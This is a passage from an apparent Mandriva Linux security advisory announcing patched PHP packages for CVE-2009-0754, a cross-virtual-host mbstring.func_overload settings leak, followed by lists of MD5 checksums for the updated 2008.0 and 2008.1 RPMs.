_______________________________________________________________________
Problem Description:
PHP 4.4.4, 5.1.6, and other versions, when running on Apache, allows
local users to modify behavior of other sites hosted on the same
web server by modifying the mbstring.func_overload setting within
.htaccess, which causes this setting to be applied to other virtual
hosts on the same server (CVE-2009-0754).
The updated packages have been patched to correct these issues.
_______________________________________________________________________
References:
http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2009-0754
_______________________________________________________________________
Updated Packages:
Mandriva Linux 2008.0:
6817b7fc8cecb169e0d76a138517f09b 2008.0/i586/libphp5_common5-5.2.4-3.5mdv2008.0.i586.rpm
f484adb8d06c538cbe2a05b2dda13660 2008.0/i586/php-bcmath-5.2.4-3.5mdv2008.0.i586.rpm
20d672144688deca9c042de5c435d91d 2008.0/i586/php-bz2-5.2.4-3.5mdv2008.0.i586.rpm
b6d95c8fdc4ac65642711b65a35baf73 2008.0/i586/php-calendar-5.2.4-3.5mdv2008.0.i586.rpm
e78ff4e9aeaa54a919dff7cc9ade7e8d 2008.0/i586/php-cgi-5.2.4-3.5mdv2008.0.i586.rpm
4cbe8f23c20839d9beb07db50c484d8c 2008.0/i586/php-cli-5.2.4-3.5mdv2008.0.i586.rpm
c62c71bf6178eb7e317365f25bb51101 2008.0/i586/php-ctype-5.2.4-3.5mdv2008.0.i586.rpm
6a179db52f5020a714d7c20a5a970b1c 2008.0/i586/php-curl-5.2.4-3.5mdv2008.0.i586.rpm
43a34e79b95814d7193ff830b0aa7dff 2008.0/i586/php-dba-5.2.4-3.5mdv2008.0.i586.rpm
639080e8f223734bb0c437d3def33bc9 2008.0/i586/php-dbase-5.2.4-3.5mdv2008.0.i586.rpm
f019479e8eeaff7258276262480a9f86 2008.0/i586/php-devel-5.2.4-3.5mdv2008.0.i586.rpm
b74e45c4bc7f486c35af5ca2440e2d58 2008.0/i586/php-dom-5.2.4-3.5mdv2008.0.i586.rpm
599c9b02ed80c5f441009e82f3402aae 2008.0/i586/php-exif-5.2.4-3.5mdv2008.0.i586.rpm
637a3269eb564aff3ffb661e353a5d22 2008.0/i586/php-fcgi-5.2.4-3.5mdv2008.0.i586.rpm
2dfa53416e0c26124fc628c35fe667a6 2008.0/i586/php-filter-5.2.4-3.5mdv2008.0.i586.rpm
ae04ec182eb2b316a5e60997cd22cb13 2008.0/i586/php-ftp-5.2.4-3.5mdv2008.0.i586.rpm
dd3dddbd177d90366286effb8d4f9ec5 2008.0/i586/php-gd-5.2.4-3.5mdv2008.0.i586.rpm
a5611d7d3fdb55aaf88da43df3ce59c9 2008.0/i586/php-gettext-5.2.4-3.5mdv2008.0.i586.rpm
8fc8d0a71d2082b9299f1117d865a5d3 2008.0/i586/php-gmp-5.2.4-3.5mdv2008.0.i586.rpm
0dcbf024ff676650a2c90756719086be 2008.0/i586/php-hash-5.2.4-3.5mdv2008.0.i586.rpm
923408f205ea7dcc69fe80033aead819 2008.0/i586/php-iconv-5.2.4-3.5mdv2008.0.i586.rpm
2b19ee8e0703fb6cbca2a057739d361f 2008.0/i586/php-imap-5.2.4-3.5mdv2008.0.i586.rpm
29604f30dda9d43aaf1fc282dc60045c 2008.0/i586/php-json-5.2.4-3.5mdv2008.0.i586.rpm
6d6cf52d57990b433d906b12d42fec8b 2008.0/i586/php-ldap-5.2.4-3.5mdv2008.0.i586.rpm
a7783cf72a398d332994a85075712666 2008.0/i586/php-mbstring-5.2.4-3.5mdv2008.0.i586.rpm
14e2af6102e379dd30340b4805dc850c 2008.0/i586/php-mcrypt-5.2.4-3.5mdv2008.0.i586.rpm
19be3f1680243918d2130b697d2622c4 2008.0/i586/php-mhash-5.2.4-3.5mdv2008.0.i586.rpm
3b27d5f0741e3e7de3e624f2c18f2b46 2008.0/i586/php-mime_magic-5.2.4-3.5mdv2008.0.i586.rpm
ebd764876db84efd8a17faa6ae9b5f7a 2008.0/i586/php-ming-5.2.4-3.5mdv2008.0.i586.rpm
5814f12508453ba950da5ba6cefbaac5 2008.0/i586/php-mssql-5.2.4-3.5mdv2008.0.i586.rpm
85f18345bec730a7ac1f0919e9a76fe8 2008.0/i586/php-mysql-5.2.4-3.5mdv2008.0.i586.rpm
f7874e3ad3062a9bb932105f39182a52 2008.0/i586/php-mysqli-5.2.4-3.5mdv2008.0.i586.rpm
de98c96be9807bbd89e5012dfa8fc423 2008.0/i586/php-ncurses-5.2.4-3.5mdv2008.0.i586.rpm
e4a2f64f33628db36a88ba12ebebbc94 2008.0/i586/php-odbc-5.2.4-3.5mdv2008.0.i586.rpm
303977af11689f7030ad42af5bb6ff0e 2008.0/i586/php-openssl-5.2.4-3.5mdv2008.0.i586.rpm
a4d11ceeaa02b0ab84c242d9eeb234ec 2008.0/i586/php-pcntl-5.2.4-3.5mdv2008.0.i586.rpm
32fe7ec6429be3b3a475c20b6122ce26 2008.0/i586/php-pdo-5.2.4-3.5mdv2008.0.i586.rpm
251cd4bb2e5be5ae17acc80acaa2d90a 2008.0/i586/php-pdo_dblib-5.2.4-3.5mdv2008.0.i586.rpm
840104aa97e5ef8d7b564771071d7514 2008.0/i586/php-pdo_mysql-5.2.4-3.5mdv2008.0.i586.rpm
b2634ef32c2b52cad42cdf83b81acab1 2008.0/i586/php-pdo_odbc-5.2.4-3.5mdv2008.0.i586.rpm
592033cfa7a18232f31e828928478143 2008.0/i586/php-pdo_pgsql-5.2.4-3.5mdv2008.0.i586.rpm
4243111fc22b1b35c4c91042ed6698cc 2008.0/i586/php-pdo_sqlite-5.2.4-3.5mdv2008.0.i586.rpm
901399176ebf6a51da7dfa4951a70ba0 2008.0/i586/php-pgsql-5.2.4-3.5mdv2008.0.i586.rpm
930403f48f7a8e63648489e6a9d7c33f 2008.0/i586/php-posix-5.2.4-3.5mdv2008.0.i586.rpm
3aa0d728c4e8861e52e7dc3e770601b4 2008.0/i586/php-pspell-5.2.4-3.5mdv2008.0.i586.rpm
bc5b445e017b3b81fff29b60f6009e93 2008.0/i586/php-readline-5.2.4-3.5mdv2008.0.i586.rpm
8bbb3b629b9bd6961fc02cd971ff66df 2008.0/i586/php-recode-5.2.4-3.5mdv2008.0.i586.rpm
0c67ca595b579d0d8b7e7ba2676a58ac 2008.0/i586/php-session-5.2.4-3.5mdv2008.0.i586.rpm
119c1e24b95396f249dec9103eb317e2 2008.0/i586/php-shmop-5.2.4-3.5mdv2008.0.i586.rpm
90b49651d35aefbce08862426a2cb824 2008.0/i586/php-simplexml-5.2.4-3.5mdv2008.0.i586.rpm
b1286df6ce6443853b91fadf0b51129a 2008.0/i586/php-snmp-5.2.4-3.5mdv2008.0.i586.rpm
791e4a8528e0a26a11339ba95f058d81 2008.0/i586/php-soap-5.2.4-3.5mdv2008.0.i586.rpm
1693234336370401246c34eaea324523 2008.0/i586/php-sockets-5.2.4-3.5mdv2008.0.i586.rpm
a468d0bda163640dd38c2ad4bbea2d20 2008.0/i586/php-sqlite-5.2.4-3.5mdv2008.0.i586.rpm
a59e6dd79bb5451cc8c1ef5f87b9c643 2008.0/i586/php-sysvmsg-5.2.4-3.5mdv2008.0.i586.rpm
f23f1893a95ad352aaf00c6df031dbf2 2008.0/i586/php-sysvsem-5.2.4-3.5mdv2008.0.i586.rpm
55169c0284852ee1b00ecb5eae3d5a11 2008.0/i586/php-sysvshm-5.2.4-3.5mdv2008.0.i586.rpm
cf3fdc27986b556396ce5ccdfce4ff90 2008.0/i586/php-tidy-5.2.4-3.5mdv2008.0.i586.rpm
0340cb689cba22be6d71b4148af4f29d 2008.0/i586/php-tokenizer-5.2.4-3.5mdv2008.0.i586.rpm
f1be80919c306e185a137b40f5e84cf4 2008.0/i586/php-wddx-5.2.4-3.5mdv2008.0.i586.rpm
00149fa518c9700953fe09bf8982706c 2008.0/i586/php-xml-5.2.4-3.5mdv2008.0.i586.rpm
9d1904ca199f201b4b5bd75491641b65 2008.0/i586/php-xmlreader-5.2.4-3.5mdv2008.0.i586.rpm
538b4325eb54795ebc1c0df8cdc9ae23 2008.0/i586/php-xmlrpc-5.2.4-3.5mdv2008.0.i586.rpm
5e1c42b5470bd53b6bb8ced1997505c4 2008.0/i586/php-xmlwriter-5.2.4-3.5mdv2008.0.i586.rpm
320719a2533d4393afbb57a327f449a5 2008.0/i586/php-xsl-5.2.4-3.5mdv2008.0.i586.rpm
ef91a6f4885a396cc37b5bbdf41c4c2d 2008.0/i586/php-zlib-5.2.4-3.5mdv2008.0.i586.rpm
9e31bb51fea2c19142048d60ed29d5ac 2008.0/SRPMS/php-5.2.4-3.5mdv2008.0.src.rpm
Mandriva Linux 2008.0/X86_64:
9ee7693384769ee7231bc97ba8e545ad 2008.0/x86_64/lib64php5_common5-5.2.4-3.5mdv2008.0.x86_64.rpm
1a503b4133ae9f5ec5cefa73d1357fc0 2008.0/x86_64/php-bcmath-5.2.4-3.5mdv2008.0.x86_64.rpm
9d0743722ec083c4bf075dfdbfd81972 2008.0/x86_64/php-bz2-5.2.4-3.5mdv2008.0.x86_64.rpm
e5df76df69e141c59da615dee8fcd67f 2008.0/x86_64/php-calendar-5.2.4-3.5mdv2008.0.x86_64.rpm
c34027c38419441099d4736e6dc57a10 2008.0/x86_64/php-cgi-5.2.4-3.5mdv2008.0.x86_64.rpm
ef4f52115d0d578e6604f425337b9a08 2008.0/x86_64/php-cli-5.2.4-3.5mdv2008.0.x86_64.rpm
fd70de0eabefdd829c9d210ae1c7de9f 2008.0/x86_64/php-ctype-5.2.4-3.5mdv2008.0.x86_64.rpm
cd672978186d2d9a38825a2ad6dfb08b 2008.0/x86_64/php-curl-5.2.4-3.5mdv2008.0.x86_64.rpm
423b000c70c2c97ad7c9155158c6578c 2008.0/x86_64/php-dba-5.2.4-3.5mdv2008.0.x86_64.rpm
0bc239359add4a93f90f02ec967c5775 2008.0/x86_64/php-dbase-5.2.4-3.5mdv2008.0.x86_64.rpm
a83770c05086e4698a738504a857f4ea 2008.0/x86_64/php-devel-5.2.4-3.5mdv2008.0.x86_64.rpm
6197196f01afe3dc3108d2a0cd49abb9 2008.0/x86_64/php-dom-5.2.4-3.5mdv2008.0.x86_64.rpm
de7397904d7a96b82542e594f6c9a424 2008.0/x86_64/php-exif-5.2.4-3.5mdv2008.0.x86_64.rpm
f668b70c1f95da26858383c6a96d356c 2008.0/x86_64/php-fcgi-5.2.4-3.5mdv2008.0.x86_64.rpm
0c18dae1d380805636bfcf63ce7e53c0 2008.0/x86_64/php-filter-5.2.4-3.5mdv2008.0.x86_64.rpm
fab3adf34eb1ba08670d9c0a5a11ba1a 2008.0/x86_64/php-ftp-5.2.4-3.5mdv2008.0.x86_64.rpm
1a1534e640dd00f2916f4c1527fa78a0 2008.0/x86_64/php-gd-5.2.4-3.5mdv2008.0.x86_64.rpm
99fdd9644f53f7e042a16a0584298830 2008.0/x86_64/php-gettext-5.2.4-3.5mdv2008.0.x86_64.rpm
f35eb6e836a14c37a8fcda315885281d 2008.0/x86_64/php-gmp-5.2.4-3.5mdv2008.0.x86_64.rpm
b5b4dbbbd2bad91a57aeb793b782e3aa 2008.0/x86_64/php-hash-5.2.4-3.5mdv2008.0.x86_64.rpm
ab55262a28e0130ed993d2b104eca63a 2008.0/x86_64/php-iconv-5.2.4-3.5mdv2008.0.x86_64.rpm
609377659611b09a912c3f4e4c83be76 2008.0/x86_64/php-imap-5.2.4-3.5mdv2008.0.x86_64.rpm
6d3660ffea2d24be4c68d793134c0c34 2008.0/x86_64/php-json-5.2.4-3.5mdv2008.0.x86_64.rpm
675c9aa058452560f0a9abdf5fd2ba82 2008.0/x86_64/php-ldap-5.2.4-3.5mdv2008.0.x86_64.rpm
dc5b6c53e1e758d6b74c1fe10825dd72 2008.0/x86_64/php-mbstring-5.2.4-3.5mdv2008.0.x86_64.rpm
ff64296fcbda0f7569682bd59673450f 2008.0/x86_64/php-mcrypt-5.2.4-3.5mdv2008.0.x86_64.rpm
99104282fed99bc02a25409fc7d7029b 2008.0/x86_64/php-mhash-5.2.4-3.5mdv2008.0.x86_64.rpm
2df02e622e28c550232af3c6e06e0166 2008.0/x86_64/php-mime_magic-5.2.4-3.5mdv2008.0.x86_64.rpm
e9e866f96e0443fc64dd2ae57c0472ef 2008.0/x86_64/php-ming-5.2.4-3.5mdv2008.0.x86_64.rpm
f597684da35da805d0a220b025a3ae7c 2008.0/x86_64/php-mssql-5.2.4-3.5mdv2008.0.x86_64.rpm
064d13eb46925a16963ba775a226ef12 2008.0/x86_64/php-mysql-5.2.4-3.5mdv2008.0.x86_64.rpm
2493c54d72dc450f91d93c0dbc0a01b3 2008.0/x86_64/php-mysqli-5.2.4-3.5mdv2008.0.x86_64.rpm
20a3a90aa00f1b22869f1fc7d4494389 2008.0/x86_64/php-ncurses-5.2.4-3.5mdv2008.0.x86_64.rpm
8fdaffa64e39a508970fb415f6351f01 2008.0/x86_64/php-odbc-5.2.4-3.5mdv2008.0.x86_64.rpm
faf9ad17354a15f824ffecd5bb2a75b7 2008.0/x86_64/php-openssl-5.2.4-3.5mdv2008.0.x86_64.rpm
26f0c38401eed5590503d8a508035b95 2008.0/x86_64/php-pcntl-5.2.4-3.5mdv2008.0.x86_64.rpm
14678e0afc46cbf3f4023e0f867b6627 2008.0/x86_64/php-pdo-5.2.4-3.5mdv2008.0.x86_64.rpm
1370da5235cfdee0b87c9c9d1c7fb87d 2008.0/x86_64/php-pdo_dblib-5.2.4-3.5mdv2008.0.x86_64.rpm
54b56629d70affc6571710d259adbc87 2008.0/x86_64/php-pdo_mysql-5.2.4-3.5mdv2008.0.x86_64.rpm
d02fb5a48a3223ff24ffd73ebf7f950b 2008.0/x86_64/php-pdo_odbc-5.2.4-3.5mdv2008.0.x86_64.rpm
eb8602cd46cedc5ddc85ad9d1d841139 2008.0/x86_64/php-pdo_pgsql-5.2.4-3.5mdv2008.0.x86_64.rpm
2185bcf9b149d2f52ac9f0d103e64aec 2008.0/x86_64/php-pdo_sqlite-5.2.4-3.5mdv2008.0.x86_64.rpm
6ce02c1ad887d742a875c3d01044dddd 2008.0/x86_64/php-pgsql-5.2.4-3.5mdv2008.0.x86_64.rpm
b2b60dfa46b225b916cdb7b9404c4df6 2008.0/x86_64/php-posix-5.2.4-3.5mdv2008.0.x86_64.rpm
7ad5cbb447442b4153ed448d576318a4 2008.0/x86_64/php-pspell-5.2.4-3.5mdv2008.0.x86_64.rpm
43f1710129923b2ef65fd5cbe4b9da4e 2008.0/x86_64/php-readline-5.2.4-3.5mdv2008.0.x86_64.rpm
ae13ce727c71a8c177038e8619d7bc43 2008.0/x86_64/php-recode-5.2.4-3.5mdv2008.0.x86_64.rpm
e71ff58f0f7d63898d8bb7c1e82221a7 2008.0/x86_64/php-session-5.2.4-3.5mdv2008.0.x86_64.rpm
be073bccced4fff6145b7d605ebe10a4 2008.0/x86_64/php-shmop-5.2.4-3.5mdv2008.0.x86_64.rpm
d2aebb985287f8532927b82afe8b34fc 2008.0/x86_64/php-simplexml-5.2.4-3.5mdv2008.0.x86_64.rpm
1621c40c1ce5d44c4c268fe8611554f3 2008.0/x86_64/php-snmp-5.2.4-3.5mdv2008.0.x86_64.rpm
284a2ca48992069c3d4f94b9af36adf4 2008.0/x86_64/php-soap-5.2.4-3.5mdv2008.0.x86_64.rpm
b15bfb57514e457907132864d1e42207 2008.0/x86_64/php-sockets-5.2.4-3.5mdv2008.0.x86_64.rpm
cc13532ecd7a1945e09402d002a3b026 2008.0/x86_64/php-sqlite-5.2.4-3.5mdv2008.0.x86_64.rpm
3969fc11de6e1ef81d2609aaeeec397d 2008.0/x86_64/php-sysvmsg-5.2.4-3.5mdv2008.0.x86_64.rpm
04ec75ae57fef315eb9263da9e07610a 2008.0/x86_64/php-sysvsem-5.2.4-3.5mdv2008.0.x86_64.rpm
b51fc6f6b20232c427083d8699b308ca 2008.0/x86_64/php-sysvshm-5.2.4-3.5mdv2008.0.x86_64.rpm
53a1677552314b4ae1d6eadeebb9685f 2008.0/x86_64/php-tidy-5.2.4-3.5mdv2008.0.x86_64.rpm
72458375e9f70bc34a8133e92dcfd720 2008.0/x86_64/php-tokenizer-5.2.4-3.5mdv2008.0.x86_64.rpm
19ea2a5d529f4dac7b12e4f37b748c98 2008.0/x86_64/php-wddx-5.2.4-3.5mdv2008.0.x86_64.rpm
8541c5727a7d9133a6d7feb34f36ab43 2008.0/x86_64/php-xml-5.2.4-3.5mdv2008.0.x86_64.rpm
e42639d37bfa2d343403d8bc41313dfa 2008.0/x86_64/php-xmlreader-5.2.4-3.5mdv2008.0.x86_64.rpm
1baf9130053d83acdf533e1482a62518 2008.0/x86_64/php-xmlrpc-5.2.4-3.5mdv2008.0.x86_64.rpm
6cd04d07a856fea874d7507d5169688c 2008.0/x86_64/php-xmlwriter-5.2.4-3.5mdv2008.0.x86_64.rpm
5ba83b408e1196608ce18a00c91d98d5 2008.0/x86_64/php-xsl-5.2.4-3.5mdv2008.0.x86_64.rpm
80f1966de2b65538bdd7eb714ec0473a 2008.0/x86_64/php-zlib-5.2.4-3.5mdv2008.0.x86_64.rpm
9e31bb51fea2c19142048d60ed29d5ac 2008.0/SRPMS/php-5.2.4-3.5mdv2008.0.src.rpm
Mandriva Linux 2008.1:
2699bedf3669cddf596019923c01988b 2008.1/i586/libphp5_common5-5.2.5-14.4mdv2008.1.i586.rpm
5e9fff154cbd7340effcdd4272cc1036 2008.1/i586/php-bcmath-5.2.5-14.4mdv2008.1.i586.rpm
433fedbea61d093164e2fc9a0861b04a 2008.1/i586/php-bz2-5.2.5-14.4mdv2008.1.i586.rpm
ca22e5f80da1aa662d50d52ecccfc7bd 2008.1/i586/php-calendar-5.2.5-14.4mdv2008.1.i586.rpm
11d2bc1eef435ff465e929f70b7881b8 2008.1/i586/php-cgi-5.2.5-14.4mdv2008.1.i586.rpm
a971a160099aed54bc5efd863c7ec726 2008.1/i586/php-cli-5.2.5-14.4mdv2008.1.i586.rpm
4c2943b731b79c7e1e83751d2cddbc02 2008.1/i586/php-ctype-5.2.5-14.4mdv2008.1.i586.rpm
9151d363427449be03f8ef369559a319 2008.1/i586/php-curl-5.2.5-14.4mdv2008.1.i586.rpm
fd2e195a1627760e3fd1365a04e52546 2008.1/i586/php-dba-5.2.5-14.4mdv2008.1.i586.rpm
64be53b60563920c6df5a23a7a0c6285 2008.1/i586/php-dbase-5.2.5-14.4mdv2008.1.i586.rpm
5cabc96de40a9d96d8149e901a16cc98 2008.1/i586/php-devel-5.2.5-14.4mdv2008.1.i586.rpm
d10c3b4c8f10a61ee25d1f6037e51e62 2008.1/i586/php-dom-5.2.5-14.4mdv2008.1.i586.rpm
720b79d68eb3e4a79955119737191847 2008.1/i586/php-exif-5.2.5-14.4mdv2008.1.i586.rpm
fea8f8ed02a5f30f37e973f94be6a994 2008.1/i586/php-fcgi-5.2.5-14.4mdv2008.1.i586.rpm
647c4c99aae392c51f09229d1579c4ea 2008.1/i586/php-filter-5.2.5-14.4mdv2008.1.i586.rpm
b35c322379ea0dedec553e47903caa72 2008.1/i586/php-ftp-5.2.5-14.4mdv2008.1.i586.rpm
e3f8416f8a9dec5d25dab3aa2b104b69 2008.1/i586/php-gd-5.2.5-14.4mdv2008.1.i586.rpm
5b92d876b74168c820a2a3981a3fc05a 2008.1/i586/php-gettext-5.2.5-14.4mdv2008.1.i586.rpm
8a02b921e2cb3cf77b89a442813f6d25 2008.1/i586/php-gmp-5.2.5-14.4mdv2008.1.i586.rpm
450d67797c65124c468e65f832160db4 2008.1/i586/php-hash-5.2.5-14.4mdv2008.1.i586.rpm
8dfaf66e72cfc48e0b7bb2d34e4a682c 2008.1/i586/php-iconv-5.2.5-14.4mdv2008.1.i586.rpm
da4f66f1ae42e3f654cfd11dfe77632f 2008.1/i586/php-imap-5.2.5-14.4mdv2008.1.i586.rpm
05f021edcd98562b9322b41ba4581e45 2008.1/i586/php-json-5.2.5-14.4mdv2008.1.i586.rpm
afa1628ecfa6fa946c464acfa29e0144 2008.1/i586/php-ldap-5.2.5-14.4mdv2008.1.i586.rpm
9c1e6614cf68b3f313f62d6b66089121 2008.1/i586/php-mbstring-5.2.5-14.4mdv2008.1.i586.rpm
4efd9f36dd4e341911163dc445d2c01c 2008.1/i586/php-mcrypt-5.2.5-14.4mdv2008.1.i586.rpm
d7b8fb005b206eda3f4c7790cfb17ce9 2008.1/i586/php-mhash-5.2.5-14.4mdv2008.1.i586.rpm
c96ea0a20a26455c4a6bd33d39226ed4 2008.1/i586/php-mime_magic-5.2.5-14.4mdv2008.1.i586.rpm
abbd2caf78f7d477ff584112bb73b989 2008.1/i586/php-ming-5.2.5-14.4mdv2008.1.i586.rpm
0d4809d6156e7738953c53db8a0c3871 2008.1/i586/php-mssql-5.2.5-14.4mdv2008.1.i586.rpm
4f3c37049e3c86995929044678a17c86 2008.1/i586/php-mysql-5.2.5-14.4mdv2008.1.i586.rpm
2679275da2c84506a8938b2f08a24bfe 2008.1/i586/php-mysqli-5.2.5-14.4mdv2008.1.i586.rpm
af23c5e284122c9a3e0c55f578919efd 2008.1/i586/php-ncurses-5.2.5-14.4mdv2008.1.i586.rpm
da89454a8b64fbb51aaf6d7ca07f776d 2008.1/i586/php-odbc-5.2.5-14.4mdv2008.1.i586.rpm
c023134ba6200923f64ce4ea6d6c6422 2008.1/i586/php-openssl-5.2.5-14.4mdv2008.1.i586.rpm
f80a84ca4c48d7e935b2cb7d781674af 2008.1/i586/php-pcntl-5.2.5-14.4mdv2008.1.i586.rpm
b0c5ee1b78931f848942783f47636484 2008.1/i586/php-pdo-5.2.5-14.4mdv2008.1.i586.rpm
7a08c05cae436660b750ca132e17262a 2008.1/i586/php-pdo_dblib-5.2.5-14.4mdv2008.1.i586.rpm
000c3039a02e9487faa5271d6821115d 2008.1/i586/php-pdo_mysql-5.2.5-14.4mdv2008.1.i586.rpm
03817f8612e8ac494c788335bb4d532e 2008.1/i586/php-pdo_odbc-5.2.5-14.4mdv2008.1.i586.rpm
64f50e0da0fb7f3e1e9829e15e2f8946 2008.1/i586/php-pdo_pgsql-5.2.5-14.4mdv2008.1.i586.rpm
32c0351660f620e178b9bff9003bad5a 2008.1/i586/php-pdo_sqlite-5.2.5-14.4mdv2008.1.i586.rpm
1e77a34d5f01511063da2194ca36d098 2008.1/i586/php-pgsql-5.2.5-14.4mdv2008.1.i586.rpm
6650386e8d87d3893564e7363430c22d 2008.1/i586/php-posix-5.2.5-14.4mdv2008.1.i586.rpm
f13b6ab00bb56e19d55f387e3412f362 2008.1/i586/php-pspell-5.2.5-14.4mdv2008.1.i586.rpm
ccb9e27af730b9de9d4d0e9e8d7b3beb 2008.1/i586/php-readline-5.2.5-14.4mdv2008.1.i586.rpm
798712a3c0a41578d7133cee15abb15b 2008.1/i586/php-recode-5.2.5-14.4mdv2008.1.i586.rpm
592bf07186391fc0ddfe20ff32116e71 2008.1/i586/php-session-5.2.5-14.4mdv2008.1.i586.rpm
a8127e519df4dcc7ebe7b8848c47409a 2008.1/i586/php-shmop-5.2.5-14.4mdv2008.1.i586.rpm
3f6be3ee7ce37b16022bd43d7bde2138 2008.1/i586/php-snmp-5.2.5-14.4mdv2008.1.i586.rpm
e80ef54ce720993ede94f9ec1273712c 2008.1/i586/php-soap-5.2.5-14.4mdv2008.1.i586.rpm
db13be028286f5c5176beffece796137 2008.1/i586/php-sockets-5.2.5-14.4mdv2008.1.i586.rpm
799b8a2dc390950bc45926fddb5c381f 2008.1/i586/php-sqlite-5.2.5-14.4mdv2008.1.i586.rpm
7ea3bc3a05b2652a25bd3c56d2d48845 2008.1/i586/php-sysvmsg-5.2.5-14.4mdv2008.1.i586.rpm
06b45292a870fc1d27e746bcbb5ebcef 2008.1/i586/php-sysvsem-5.2.5-14.4mdv2008.1.i586.rpm
921e0e7d5d22fbcf06989171eda9db5b 2008.1/i586/php-sysvshm-5.2.5-14.4mdv2008.1.i586.rpm
f302373d8e3cc6efbeb5f7345ca4901b 2008.1/i586/php-tidy-5.2.5-14.4mdv2008.1.i586.rpm
3df0e99f9cca7e700374261a0058b868 2008.1/i586/php-tokenizer-5.2.5-14.4mdv2008.1.i586.rpm
d6c41de2069f7ea20f21dcad7a55db7b 2008.1/i586/php-wddx-5.2.5-14.4mdv2008.1.i586.rpm
d44fa2efdb18bf9f4448744a9c643d5c 2008.1/i586/php-xml-5.2.5-14.4mdv2008.1.i586.rpm
c58ab80fd28701ebeb35f504a40452f3 2008.1/i586/php-xmlreader-5.2.5-14.4mdv2008.1.i586.rpm
7773725131323cd798c4913b08f6c93c 2008.1/i586/php-xmlrpc-5.2.5-14.4mdv2008.1.i586.rpm
55d2c3fc71c7ce0617b714909ea3b330 2008.1/i586/php-xmlwriter-5.2.5-14.4mdv2008.1.i586.rpm
8fd2ce7477c382ae828c774f1ea774b6 2008.1/i586/php-xsl-5.2.5-14.4mdv2008.1.i586.rpm
761b58a4e7fe100a9b56aa4d6d1be31b 2008.1/i586/php-zlib-5.2.5-14.4mdv2008.1.i586.rpm
c5bb17d306abc830af1e3289d0feb87e 2008.1/SRPMS/php-5.2.5-14.4mdv2008.1.src.rpm
Mandriva Linux 2008.1/X86_64:
491820e062701dd823cf171153094b54 2008.1/x86_64/lib64php5_common5-5.2.5-14.4mdv2008.1.x86_64.rpm
35b97f20d78e9e49557f765e3db9ce92 2008.1/x86_64/php-bcmath-5.2.5-14.4mdv2008.1.x86_64.rpm
2e79e6acff96bdf8b73ec954f43ba556 2008.1/x86_64/php-bz2-5.2.5-14.4mdv2008.1.x86_64.rpm
03b58fd4dc9965881831e4391473aae9 2008.1/x86_64/php-calendar-5.2.5-14.4mdv2008.1.x86_64.rpm
77f03d3261c625c3f5cadb6bd4739feb 2008.1/x86_64/php-cgi-5.2.5-14.4mdv2008.1.x86_64.rpm
43bfa30615bbc6153e6f42a5fd0e183c 2008.1/x86_64/php-cli-5.2.5-14.4mdv2008.1.x86_64.rpm
8cf5edbb591de82488fa9a07d7f6e9c7 2008.1/x86_64/php-ctype-5.2.5-14.4mdv2008.1.x86_64.rpm
f63a3ba96fafcc559204ee4c7a52fb2f 2008.1/x86_64/php-curl-5.2.5-14.4mdv2008.1.x86_64.rpm
434ee9781e0903accff13ed076f21934 2008.1/x86_64/php-dba-5.2.5-14.4mdv2008.1.x86_64.rpm
964b9af15e42a53a0f95b08da4aedc0d 2008.1/x86_64/php-dbase-5.2.5-14.4mdv2008.1.x86_64.rpm
04dbfc264c32c6bda62077a764a29edf 2008.1/x86_64/php-devel-5.2.5-14.4mdv2008.1.x86_64.rpm
fd50ecbb4c6a2a4365f3eb1e86eaafca 2008.1/x86_64/php-dom-5.2.5-14.4mdv2008.1.x86_64.rpm
f5f71a2eb1a3e92a2375a1a9ead9f757 2008.1/x86_64/php-exif-5.2.5-14.4mdv2008.1.x86_64.rpm
71a3b2911847c7e1bd11e37e09366690 2008.1/x86_64/php-fcgi-5.2.5-14.4mdv2008.1.x86_64.rpm
ebc91459bea6d287b777d64fbe8087c7 2008.1/x86_64/php-filter-5.2.5-14.4mdv2008.1.x86_64.rpm
092a957f088d21a58c7a1d0d62c47d9a 2008.1/x86_64/php-ftp-5.2.5-14.4mdv2008.1.x86_64.rpm
b3f06fa36ba1f75f282b09986c26c518 2008.1/x86_64/php-gd-5.2.5-14.4mdv2008.1.x86_64.rpm
b6783bf4007f5b8d2d55185aec0804da 2008.1/x86_64/php-gettext-5.2.5-14.4mdv2008.1.x86_64.rpm
4ba37091ca19fc2f3ce528318552d8e7 2008.1/x86_64/php-gmp-5.2.5-14.4mdv2008.1.x86_64.rpm
8c849776c26d3af72175ca740f75c8d0 2008.1/x86_64/php-hash-5.2.5-14.4mdv2008.1.x86_64.rpm
2b81f83d3c9abb155e8fea670be5dde5 2008.1/x86_64/php-iconv-5.2.5-14.4mdv2008.1.x86_64.rpm
f9e2405074eda8979df292baabf33c9d 2008.1/x86_64/php-imap-5.2.5-14.4mdv2008.1.x86_64.rpm
52589a8cb582f147ea84c0a30ed62e9a 2008.1/x86_64/php-json-5.2.5-14.4mdv2008.1.x86_64.rpm
e73f78480c53f4606ce7e71b4ba0ee08 2008.1/x86_64/php-ldap-5.2.5-14.4mdv2008.1.x86_64.rpm
32bee617bd97a0c8bc46bef066698228 2008.1/x86_64/php-mbstring-5.2.5-14.4mdv2008.1.x86_64.rpm
f82ee9e0bd90b6996211b49b0c24dae9 2008.1/x86_64/php-mcrypt-5.2.5-14.4mdv2008.1.x86_64.rpm
a908ff19444d0ebef0118cc004a1ae12 2008.1/x86_64/php-mhash-5.2.5-14.4mdv2008.1.x86_64.rpm
c884d06cffc3b87ce307cfb3ec9f25de 2008.1/x86_64/php-mime_magic-5.2.5-14.4mdv2008.1.x86_64.rpm
ac81fb9db82e8df732920de0acb8a54a 2008.1/x86_64/php-ming-5.2.5-14.4mdv2008.1.x86_64.rpm
674155d47bdc17f7fefe4c6cd536ac88 2008.1/x86_64/php-mssql-5.2.5-14.4mdv2008.1.x86_64.rpm
a9f6d8fb665a426b51cfb0648a59fc99 2008.1/x86_64/php-mysql-5.2.5-14.4mdv2008.1.x86_64.rpm
e79dbc75577e346fb6a9d15126e7d1c8 2008.1/x86_64/php-mysqli-5.2.5-14.4mdv2008.1.x86_64.rpm
64fb3e36e335c0ad81f55996ad2c059a 2008.1/x86_64/php-ncurses-5.2.5-14.4mdv2008.1.x86_64.rpm
43df90bdffabf8d81874337a5227f70a 2008.1/x86_64/php-odbc-5.2.5-14.4mdv2008.1.x86_64.rpm
7f1fd373649c8af3936c3a2c80d2d03e 2008.1/x86_64/php-openssl-5.2.5-14.4mdv2008.1.x86_64.rpm
ed5c02a83a387666a2ac96b8b56c03d3 2008.1/x86_64/php-pcntl-5.2.5-14.4mdv2008.1.x86_64.rpm
